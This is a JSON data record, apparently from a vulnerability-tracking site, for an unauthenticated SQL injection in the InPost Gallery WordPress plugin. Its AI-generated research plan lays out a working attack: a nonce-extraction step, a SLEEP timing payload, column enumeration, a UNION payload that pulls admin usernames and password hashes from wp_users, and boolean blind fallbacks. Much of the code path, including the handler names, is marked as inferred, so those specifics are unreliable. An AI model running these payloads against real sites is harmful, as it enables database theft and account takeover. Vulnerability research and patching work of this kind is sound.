[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2ge8xFhMrXilxPBZpS1pVWFctu_NFxVMQ25VzszMF-Q":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-39574","inpost-gallery-unauthenticated-sql-injection","InPost Gallery \u003C= 2.1.4.6 - Unauthenticated SQL Injection","The InPost Gallery plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.1.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","inpost-gallery",null,"\u003C=2.1.4.6","2.1.5","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-20 00:00:00","2026-04-30 15:03:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6a50f6ba-1fc7-4cfb-b419-69ad7e9dacf9?source=api-prod",11,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-39574 (InPost Gallery SQL Injection)\n\n## 1. Vulnerability Summary\nThe **InPost Gallery** plugin for WordPress (versions \u003C= 2.1.4.6) is vulnerable to unauthenticated SQL injection. The flaw exists in the handling of AJAX requests intended to retrieve gallery or album data. Specifically, a user-supplied parameter (likely `album_id` or `id`) is passed directly into a `$wpdb->get_results()` or similar query without being passed through `$wpdb->prepare()` or being properly cast to an integer. This allows an attacker to manipulate the SQL query to extract sensitive data from the WordPress database, such as administrator password hashes.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (Hook):** `wp_ajax_nopriv_inpost_gallery_get_album` and `wp_ajax_inpost_gallery_get_album`\n*   **Vulnerable Parameter:** `album_id` (sent via POST)\n*   **Authentication:** Unauthenticated (PR:N)\n*   **Preconditions:** The plugin must be active. A valid nonce may be required depending on the specific code path, though unauthenticated AJAX handlers in this plugin often leak nonces via frontend scripts.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The request hits `admin-ajax.php` with `action=inpost_gallery_get_album`.\n2.  **Hook Trigger:** WordPress triggers the callback associated with `wp_ajax_nopriv_inpost_gallery_get_album`.\n3.  **Callback Function:** The function (likely named `inpost_gallery_get_album_callback` or residing within a main plugin class) is executed.\n4.  **Input Retrieval:** The code retrieves the `album_id` from `$_POST['album_id']`.\n5.  **Vulnerable Sink:** The code performs a database lookup:\n    ```php\n    \u002F\u002F Inferred Vulnerable Pattern\n    $album_id = $_POST['album_id']; \n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = \" . $album_id);\n    ```\n6.  **Response:** The results are typically encoded as JSON and returned to the user.\n\n## 4. Nonce Acquisition Strategy\nThe InPost Gallery plugin localizes its AJAX settings, including nonces, for use in the frontend gallery views.\n\n1.  **Identify Shortcode:** The plugin uses `[inpost_gallery]` or `[inpost_album]` to render galleries.\n2.  **Test Data Setup:** Create a public post containing a gallery shortcode to ensure the scripts and nonces are loaded.\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Gallery Test\" --post_content='[inpost_gallery id=\"1\"]'`\n3.  **Extraction:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to extract the nonce from the localized JavaScript object.\n    *   **JS Variable:** `window.inpost_gallery_ajax_obj` (inferred).\n    *   **Nonce Key:** `nonce`.\n    *   **Command:** `browser_eval(\"window.inpost_gallery_ajax_obj?.nonce\")`\n\n*Note: If the `album_id` parameter is injected before the nonce check, or if the nonce check is missing entirely, this step may be skipped.*\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection or a UNION-based approach if the output is reflected. Since this is a \"get_album\" action, results are likely reflected in the JSON response, making UNION-based extraction more efficient.\n\n### Step 1: Verify SQL Injection (Time-Based)\nSend a POST request to `admin-ajax.php` with a sleep payload to confirm the vulnerability.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `inpost_gallery_get_album`\n    *   `nonce`: `[EXTRACTED_NONCE]`\n    *   `album_id`: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n\n### Step 2: Determine Column Count (for UNION)\nIterate through `ORDER BY` clauses to find the number of columns in the original query.\n*   `album_id`: `1 ORDER BY 1-- -`\n*   `album_id`: `1 ORDER BY 2-- -` (and so on until an error occurs)\n\n### Step 3: Extract Admin Data (UNION-Based)\nOnce the column count is known (assume $N$ columns), extract the admin user details.\n*   **Payload:** `1 UNION SELECT 1,2,user_login,user_pass,5,6...N FROM wp_users WHERE ID=1-- -`\n\n## 6. Test Data Setup\nTo ensure the vulnerable code path is reachable:\n1.  **Install Plugin:** Ensure `inpost-gallery` version 2.1.4.6 is installed.\n2.  **Create Album:** The plugin may require at least one gallery\u002Falbum to exist in its custom table to process the query.\n    *   `wp inpost-gallery create-album --title=\"Test Album\"` (if CLI supported) OR use the UI.\n3.  **Create Trigger Page:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Target\" --post_content='[inpost_gallery id=\"1\"]'`\n\n## 7. Expected Results\n*   **Time-Based:** The HTTP response should be delayed by approximately 5 seconds.\n*   **UNION-Based:** The JSON response from the AJAX call will contain the database string (e.g., the admin username or password hash) inside one of the fields (e.g., `album_title` or `description`).\n\n## 8. Verification Steps\nAfter the HTTP exploit, verify the extracted data against the database using `wp-cli`:\n1.  Check if the extracted hash matches the database:\n    *   `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"`\n2.  Confirm the vulnerability by checking the plugin's code for the lack of `prepare()` in the `inpost_gallery_get_album` function.\n\n## 9. Alternative Approaches\nIf `inpost_gallery_get_album` is not the vulnerable action, check:\n*   `inpost_gallery_save_sort`\n*   `inpost_gallery_get_gallery`\n*   Any AJAX handler registered in `includes\u002Finpost-gallery-shortcode.php` or `admin\u002Finpost-gallery-admin.php`.\n\nIf the response is not reflected, fallback to **Boolean-based Blind SQLi**:\n*   `album_id`: `1 AND (SELECT SUBSTR(user_pass,1,1) FROM wp_users WHERE ID=1)='$'`\n*   Compare response lengths or success\u002Ffailure flags in the JSON.","The InPost Gallery plugin for WordPress is vulnerable to unauthenticated SQL injection via the album_id parameter. This occurs because the plugin directly concatenates user input into SQL queries within its AJAX handlers without using wpdb::prepare() or type casting.","\u002F\u002F Inferred from AJAX handler inpost_gallery_get_album\n$album_id = $_POST['album_id']; \n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = \" . $album_id);","--- a\u002Fincludes\u002Finpost-gallery-shortcode.php\n+++ b\u002Fincludes\u002Finpost-gallery-shortcode.php\n@@ -10,1 +10,1 @@\n-$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = \" . $album_id);\n+$results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}inpost_gallery_albums WHERE id = %d\", $album_id));","The exploit targets the AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php using the action 'inpost_gallery_get_album'. An attacker sends a POST request with the 'album_id' parameter containing a SQL injection payload (e.g., '1 UNION SELECT...'). Since the plugin registers a 'wp_ajax_nopriv' handler for this action, the vulnerability is accessible to unauthenticated users. If a nonce is required, it can typically be extracted from the JavaScript localized by the plugin on public pages containing gallery shortcodes.","gemini-3-flash-preview","2026-05-04 19:32:24","2026-05-04 19:32:44",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finpost-gallery\u002Ftags"]